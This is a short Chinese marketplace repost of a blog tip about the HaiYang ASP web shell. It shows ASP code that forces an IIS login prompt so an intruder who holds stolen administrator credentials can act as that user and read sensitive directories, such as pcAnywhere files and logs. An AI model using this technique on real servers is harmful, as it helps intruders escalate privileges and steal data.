源码网商城,靠谱的源码在线交易网站 我的订单 购物车 帮助

源码网商城

海阳2006+功能中的潜水王

  • 时间:2021-03-10 22:07 编辑: 来源: 阅读:
  • 扫一扫,手机访问
摘要:海阳2006+功能中的潜水王
ps:我还没测试。 信息来源:H4×0r's Blog
[u]复制代码[/u] 代码如下:
bOtherUser = False ''是否需要其它NT用户身份登录  If bOtherUser = True And Trim(Request.ServerVariables("AUTH_USER")) = "" Then  Response.Status = "401 Unauthorized"  Response.Addheader "WWW-AuThenticate", "BASIC"  If Request.ServerVariables("AUTH_USER") = "" Then Response.End()  End If 
重点点播 Response.Status = "401 Unauthorized"只要在代码开头加入这句,IIS就会自动调用登陆窗口啦 此功能可以调用其它NT用户身份登录 如果你知道比GUEST权限大的用户的密码什么的话,比如管理员,嘿嘿~你就发达了[例如:通过FINDPASS,或自动登陆获取的] 比如知道管理员的密码,但是对方没终端,没其他可以提权限的东东,嘿嘿这个东西就可以帮你忙了 登陆后,获得的权限是相应的登陆用户的权限哦! 敏感目录:存放CIF的PCANYWHERE、启动等目录 可以进入该用户拥有权限的所有目录,以及查阅其拥有权限的文件,比如LOG什么的。
  • 全部评论(0)
联系客服
客服电话:
400-000-3129
微信版

扫一扫进微信版
返回顶部